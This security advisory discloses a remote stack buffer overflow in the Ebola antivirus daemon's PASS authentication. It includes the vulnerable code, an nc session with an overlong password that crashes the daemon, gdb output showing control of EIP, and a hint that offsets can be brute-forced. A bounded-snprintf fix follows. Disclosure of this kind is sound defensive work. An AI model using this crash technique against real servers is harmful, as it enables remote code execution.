Ebola is an anti-virus scanning daemon that considerably improves the performance of scanning systems such as AMaViS, Inflex and other programs that require on-demand scanning from various AV engines. The Ebola daemon contains a remotely exploitable buffer overflow in its authentication sequence.
Vulnerable systems:
* Ebola version 0.1.4 and prior
This issue is caused by the handle_PASS() function in ebola.c:

    char outstr[100];
    ...
    if (passwd) {
        if (PASS_authenticate(username, passwd) == _PASS_OK) {
            /* unbounded write: username and passwd are attacker-supplied */
            sprintf(outstr, "PASS NOT ACCEPTED for user \"%s\", pass \"%s\".\n", username, passwd);
    ...
Exploiting this issue is fairly simple: by providing either an overly long password or username you can overflow the 100-byte buffer and overwrite the saved return address (EIP).
bash-2.05b$ nc localhost 1665
Welcome to Ebola v0.1.4
user ZZZZXXX
USER name received, please send PASS
pass AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...ABCD
PASS NOT ACCEPTED for user "ZZZZXXX", pass "AAAAAAAAAAA...
A quick look in gdb shows us that this should be a vanilla stack overflow.
[root@RiotStarter root]# gdb ebola 10440
Attaching to process 10440
Reading symbols from /home/dotslash/ebola-0.1.4/ebola...
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x44434241 in ?? ()
(gdb) i r
eax 0x0 0
ecx 0xbffba7c4 -1074026556
edx 0x0 0
ebx 0x41414141 1094795585
esp 0xbffbaa10 0xbffbaa10
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x44434241 0x44434241
The master ebola process never dies; it continues to spawn children regardless of how many times you attempt to exploit the issue. Because of this you can brute force both the length to EIP and the offsets used for shellcode.
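The following is an added example, not code from the Ebola project or its patch: it shows the handle_PASS() reply being formatted with a bounded snprintf() into the same 100-byte buffer, preceded by a length and character check on the USER/PASS arguments. The function names, the MAX_CRED_LEN limit and the sample inputs are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>

#define OUTSTR_LEN 100   /* same size as outstr[100] in handle_PASS() */
#define MAX_CRED_LEN 32  /* assumed policy limit on USER/PASS arguments */

/* Hardened formatting of the PASS rejection reply: snprintf() bounds the
   write to outlen bytes and always NUL-terminates, so an overlong username
   or password can no longer run past the end of outstr and reach the saved
   return address. Returns 1 if the reply fit, 0 if it was truncated. */
int format_pass_reply(char *outstr, size_t outlen,
                      const char *username, const char *passwd)
{
    int needed = snprintf(outstr, outlen,
                          "PASS NOT ACCEPTED for user \"%s\", pass \"%s\".\n",
                          username, passwd);
    return needed >= 0 && (size_t)needed < outlen;
}

/* Reject a credential before it reaches any fixed-size buffer: enforce the
   length limit first, then allow only printable ASCII. Returns 1 if OK. */
int credential_ok(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > MAX_CRED_LEN)
        return 0;
    for (size_t i = 0; i < n; i++)
        if (s[i] < 0x20 || s[i] > 0x7e)
            return 0;
    return 1;
}

/* Hypothetical hardened handler: validates both arguments, then formats the
   reply. Returns 1 only if the reply was produced without truncation. */
int handle_pass_hardened(char *outstr, size_t outlen,
                         const char *username, const char *passwd)
{
    if (!credential_ok(username) || !credential_ok(passwd)) {
        snprintf(outstr, outlen, "PASS NOT ACCEPTED: argument rejected.\n");
        return 0;
    }
    return format_pass_reply(outstr, outlen, username, passwd);
}

int main(void)
{
    char outstr[OUTSTR_LEN];
    char longpass[400];                          /* constructed overlong PASS */
    memset(longpass, 'A', sizeof longpass - 1);
    longpass[sizeof longpass - 1] = '\0';
    printf("short: %d\n", handle_pass_hardened(outstr, sizeof outstr, "ZZZZXXX", "secret"));
    printf("long:  %d\n", handle_pass_hardened(outstr, sizeof outstr, "ZZZZXXX", longpass));
    return 0;
}
```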
Vendor Status:
Paul L Daniels promptly responded to this issue; a patch was available immediately after it was reported.